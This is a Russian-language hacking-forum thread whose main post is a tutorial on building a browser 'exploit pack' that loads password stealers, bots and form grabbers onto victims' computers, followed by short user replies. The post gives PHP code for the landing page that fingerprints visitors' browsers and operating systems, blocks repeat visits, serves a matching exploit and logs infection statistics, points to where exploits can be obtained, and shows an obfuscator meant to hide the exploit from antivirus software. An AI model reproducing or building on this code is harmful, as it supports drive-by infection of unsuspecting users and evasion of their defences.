Форум АНТИЧАТ - Собираем свою связку эксплойтов.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)

- - Собираем свою связку эксплойтов. (https://forum.antichat.xyz/showthread.php?t=58567)

Собираем свою связку эксплойтов.

[intro]

Доброго времени суток. Первая причина написания данной статьи это то, что в последнее время на различных форумах появляются сообщения, типо одна связка лучше или хуже, у такой то связки "пробив" составляет такой то процент и пробивают такие то браузера. Вторая причина это "лже" авторы связок, т.е. по просту барыги, которые получив связку где то на закрытых форумах пытаются ее продать или того хуже модернизировать существующую, не внося в связку практически никакого толку. Еще есть одна особенность, брать связку вставлять в нее свой ифрейм (в народе говорят стучалки) и выкладывать на публичных форумах говоря что это новая версия связки, тем самым пользуются чужим трафиком.
В этой статье мы постораемся освоить азы сборки связки .

[info]
Что такое связка сплойтов?
Связка - это объединение сушествующих эксплойтов, преимущественно использующих "баги" в браузерах для загрузки ПО. Под ПО подразумеваются различные сборщики паролей, боты, форм грабберы и другие, вообщем, все что нужно для сбора информации с компьютера жертвы.

Что входит в состав связки?
В состав связки входит, сплойты под различные версии браузеров. Но это как бы не достаточно, для контроля эффективности использование связки, т.е. просмотра статистики по браузерам, осям, странам, рефферам и количеству "пробитых" браузеров. Реффер - это тот, чей трафф приходит на связку. В некоторых связках есть продвинутая система статистики, т.е. можно контролировать какой стране "грузить" тот или иное ПО, есть возможность блокировки пользователя в случаи удачного "прогруза" ПО, стоит так называемая система GeoIp, позволяющяя определять место нахождения "пользователя", приимущественно используется для бот нета.

Откуда берут сплойты для связки?
Наверно, все замечали, что разные связки продаются по разному, стоимость связки колеблиться от 100$ и до 2к и зависит не только от написанного "ротора" сплойтов, но так же от самих сплойтов. Сплойты можно найти на многих сайтах таких как:
milw0rm.com
securitylab.ru
securityfocus.com
На сайтах приводиться уведомление о той или иной уязвимости найденой в браузере, иногда вместе со сплойтом. Для дорогих связок используют приватные сплойты, которые в конечном счете и определяют стоимость связки. Приватные сплойты - это сплойты с доконца раскрученной уязвимостью, т.е. найдя уязвимость в браузере, например переполнения буфера, нужно еще доконца ее раскрутить чтобы получился download and executable.
Подробнее об это тут

Как определить эффективность связки?
Эффективность связки определяется количеством "пробива" браузеров. Обычно используется несколько сплойтов для разных браузеров и их версиий. В статистике работы связки может приводиться общяя пробиваемость, а так же по отдельным браузерам и версиям. На данный момент самый бажным браузером считается Internet explorer за ним следует Mozilla firefox и Opera.
Подробней можно прочитать здесь
http://s-teals.org/showthread.php?p=2860
Так же там рассматриваются следующие вопросы:
Что такое стата (статистика)
Что такое пробив.
Что такое трафф (траффик) и куда его гонят.
FAQ (общие вопросы возникающие у новичков)

На каком языке программирования можно написать связку?
Преимущественно это php, т.к. имеет большее распространение в глобальной сети. Но так же подходят все языки которые могут собирать информацию об клиентском браузере, такие как perl, javascript, asp, vb, c/c++ и другие. Подробное рассмотрение ротора сплойтов на javascript можно почитать в статье -=lebed=-
http://forum.antichat.ru/thread36997.html

Дополнительные линки по теме, чтобы расширить свой кругозор:
О загрузках - http://forum.antichat.ru/thread39361.html
Криптуем php скрипты от антивирей - http://forum.antichat.ru/thread27118.html
Что такое переполнение буфера? - http://forum.antichat.ru/thread26791.html

[пишем ротор эксплойтов]
Что же нам нужно для написания связки? Во первых, нам нужно ознакомиться с базывыми основами того языка на котором мы будем писать. Я возьму php, т.к. восновном все связки пишут с его использованием.

Материал для прочтения по php:
http://www.phprus.ru/
http://phpfaq.ru/docs
http://articles.org.ru/cn/?c=6 хороший сборник статей.
По гуглив минут 5 можно еще достать хорошего мануала по php.

Что же будет входить в нашу связку?

Ротор (главная страница)
Скрипт статистики
Эксплойты

Первым делом в странице index.php нам нужно определить, что за браузер, ip посетителя и проверить не заходил ли он уже ранее.

PHP код:


		
			
$ip = getenv("REMOTE_ADDR");

$referer = substr(getenv("HTTP_REFERER"), 0, 40);

$user_agent = getenv("HTTP_USER_AGENT");

Дальше проверяем не заходил ли пользователь ранее (не будем рассматривать работу с бд, ограничемся файлами)

PHP код:


		
			
if ($ip_bans==1) {

 $ip_ban=getcwd().'/ip_ban.txt';

 $banfile=file($ip_ban);

 $s=0;

 for($i=0;$i<=count($banfile); $i++) { $ipban=trim($banfile[$i]);

 if ($ip==$ipban) {

 $s=1;

 $i=count($banfile); }}

 if ($s==1) {

 include("error.php"); exit; } // показываем страницу ошибки если пользователь уже был.

 else {

 $tban=fopen("ip_ban.txt","a+b");

 fwrite($tban,$ip."\n");

 fclose($tban); }}

Дальше начинается основной процесс - определение браузера и оси.

PHP код:


		
			
if(eregi("(msie) ([0-9]{1,2})", $user_agent, $bv))

  {

    $brow = "MSIE";

    $ver = $bv[2];

  }

 elseif(strstr($user_agent, "Nav")) $brow = "Netscape";

 elseif(strstr($user_agent, "Firefox")) $brow = "Firefox";

 elseif(strstr($user_agent, "Opera")) $brow = "Opera";

 elseif(strstr($user_agent, "Lynx")) $brow = "Lynx";

 elseif(strstr($user_agent, "WebTV")) $brow = "WebTV";

 elseif(strstr($user_agent, "Bot")) $brow = "Bot";

 elseif(strstr($user_agent, "Konqueror")) $brow = "Konqueror";

 else $brow = "Other";



 # Detect System

 if(strstr($user_agent, "Windows 95")) $os = "Windows 95";

 elseif(strstr($user_agent, "Win 9x 4.9")) $os = "Windows ME";

 elseif(strstr($user_agent, "Windows 98")) $os = "Windows 98";

 elseif(strstr($user_agent, "Windows NT 5.0")) $os = "Windows 2000";

 elseif(strstr($user_agent, "SV1")) $os = "Windows XP";

 elseif(strstr($user_agent, "Windows NT 5.1")) $os = "Windows XP";

 elseif(strstr($user_agent, "Windows NT 5.2")) $os = "Windows 2003";

 elseif(strstr($user_agent, "Windows NT 6.0")) $os = "Windows Vista";

 else $os = "Other";

Из мануалов видно, что $_SERVER['HTTP_USER_AGENT'] или $user_agent содержит основную информацию об оси браузере

Цитата:

Элемент $_SERVER['HTTP_USER_AGENT'] содержит информацию о типе и версии браузера и операционной системы посетителя.

Вот типичное содержание этой строки: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)". Наличие подстроки "MSIE 6.0" говорит о том, что посетитель просматривает страницу при помощи Internet Explorer версии 6.0. Строка "Windows NT 5.1" сообщает, что в качестве операционной системы используется Windows XP.

теперь в $brow у нас будет "точное" название браузер и можем подключить эксплой под браузер

PHP код:


		
			
if ($brow=="MSIE")

  {

    msie_stat(); // заносим в статистику браузера, функция должна быть опеределена где то в коде

    include("exp/msie.php");// exploit для Эксплоера

  }



else

  {

    other_stat(); // ^^

    include 'error.php'; // Страница с ошибкой

     }

так же можно добавлять и другие сплойты выражением

PHP код:


		
			
elseif($brow=="Opera")

  {

    opera_stat(); //^^

    include("exp/opera.php");

  }

Теперь заносим ip и браузер в нашу статистику

PHP код:


		
			
function msie_stat() // функция для Эксплоера.

 {

  $fm=fopen("brow.txt",'r');

  flock($fm,2);

  $fr=fread($fm,filesize("brow.txt"));

  list($ie,$ot)=explode("|",$fr);

  $ie++;

  flock($fm,3);

  fclose($fm);

  $mw=fopen("brow.txt",'w+');

  flock($mw,2);

  fwrite($mw,$ie."|".$ot);

  flock($mw,3);

  fclose($mw);

 }

Так же можем еще заносить в нашу статистику HTTP_REFERER это позволит там видеть откуда пришли на страницу.

attention

Цитата:

Все переменные полученные от пользователя необходимо фильтровать! Так как их легко подделать, в результате возможны уязвимости типо sql injection (когда исп бд) и xxs.

Ротом мы рассмотрели, теперь осталось создать папку exp и поместить туда те сплойты, которые актуальны на данный момент. имхо рассматривать все нет смысла из за их большого количества. Для поиска сплойта можно зайти на выше перечисленные сайты или установить пакет Metasploit Framework. Подробнее тут
http://forum.antichat.ru/thread21599.html
Сам проект находится по адресу metasploit.com
Так же немного информации по написанию эксплойтов
http://forum.antichat.ru/threadnav55819-1-10.html
http://www.opennet.ru/base/sec/remote_exploit.txt.html
http://www.xakepy.name/showthread.php?t=19610

[Прячем наш эксплоит]
Зачем нужно прятать эксплоит? Затем чтобы антивирусы не обнаружили, то что мы пытаемся загрузить ПО через браузер.
Сушествует много способов закодировать наш эксплоит одни из них это обфускация эксплоита.

Цитата:

Обфускация (от лат. obfuscare, «затенять, затемнять») — запутывание кода программы, то есть приведение исходного текста или исполняемого кода к виду, сохраняющему функциональность программы, но затрудняющему анализ, понимание алгоритмов работы и модификацию при декомпиляции. «Запутывание» кода может осуществляться на уровне алгоритма, на уровне исходного текста, ассемблерного текста. Для создания запутанного ассемблерного текста могут использоваться специализированные компиляторы, использующие неочевидные или недокументированные возможности среды исполнения программы. Существуют также специальные программы, производящие обфускацию, называемые обфускаторами (англ. Obfuscator).
http://ru.wikipedia.org/wiki/Обфускация

Пример обфускатора взятого из одной связки, код не полный.

PHP код:


		
			
function replace_all($scr) {

  $var_to_replace = 100;

  

  for ($i=1; $i<=$var_to_replace; ++$i)

    $search[] = '/var'.$i.'v/';

  for ($i=0; $i<$var_to_replace; ++$i)

    $replace[] = random_str(rand(3,7));

  

  for ($i=1; $i<=$var_to_replace; ++$i)

    $search[] = '/func'.$i.'f/';

  for ($i=0; $i<$var_to_replace; ++$i)

    $replace[] = random_str(rand(5,9));

 

  $scr = preg_replace($search, $replace, $scr);

  $scr = preg_replace_callback('/\[int:(\d+)\]/', "gen_int", $scr);

  $scr = preg_replace_callback('/\[str:(.*?)\]/', "gen_str", $scr);

  $scr = preg_replace_callback('/\[vb_str:(.*?)\]/', 'gen_str', $scr);

  return $scr;

}

function random_str($length) {

  global $unique_names;

  $res = '';

  for ($i=0; $i<$length; ++$i)

    $res .= chr(rand(97, 122));

  if (in_array($res, $unique_names)) $res = random_str($length);

  $unique_names[] = $res;

  return $res;

}



function int_to_items($n) {

  $max_n_slogs = rand(2,$n);

  $slogs = array();

  for ($i=0; $i<$max_n_slogs;++$i)

    $slogs[] = rand(1,$n);

  $cur = 0;

  $sum = array_sum($slogs);

  while ($sum != $n) {

    if ($sum > $n && $slogs[$cur] > 0) --$slogs[$cur];

      else ++$slogs[$cur];

    ++$cur;

    if ($cur >= $max_n_slogs) $cur = 0;

    $sum = array_sum($slogs);

  }

  $res = array();

  foreach ($slogs as $s)

    if ($s != 0) $res[] = $s;

  return $res;

}





function gen_int($matches) {

    $n = intval($matches[1]);

    $slogs = int_to_items($n);

    $s = implode('+', $slogs);

    return $s;

}

Так же часто применяется Zend Guard, для защиты исходного кода скрипта.

Цитата:

Zend Guard (ранее назывался Zend Encoder) — позволяет закодировать скрипт в байт-код, который потом можно использовать точно также как и обычный, за исключением возможности его отредактировать. Предназначено для защиты интересов и интеллектуальной собственности разработчика. Для работы таких скриптов обязательно нужен Zend Optimizer.
http://ru.wikipedia.org/wiki/Zend

Некоторые предпочитают руками прятать эксплоиты, т.к. изменять саму подачу эксплоита. Изменяются названия переменных, используется кодирование не только php скриптов, javascript, но и html.

для новичков норм, но в целом много и не о чем. т.к. главное в связки - сами сплойты, а про них почти ничего не написано, да и не может быть написано...

Цитата:

а про них почти ничего не написано,

Тебе дали линки на сайты, с сплойтами, заменяешь шал код начинаешь тестить.

ТС
Написал бы Что ли связку пример.

Zend Guard... знаком знаком жесткая вещь особенно когда хочеться изменить код страницы.

[-=OniX=-]
Да ладно? Очень жесткая?

Цитата:

[-=OniX=-]
Да ладно? Очень жесткая?

Писец прям

Цитата:

Приватные сплойты - это сплойты с доконца раскрученной уязвимостью, т.е. найдя уязвимость в браузере, например переполнения буфера, нужно еще доконца ее раскрутить чтобы получился download and executable.

улыбнуло...а я всегда думал что это сплойты которые используют уязвимости которые ещё не выложены в паблик =)

Надеюсь никто не воспримет это как руководство к действию , а то получатся еще одни code leachers вроде icepack , firepack и прочие чьи авторы сильно мечтанули.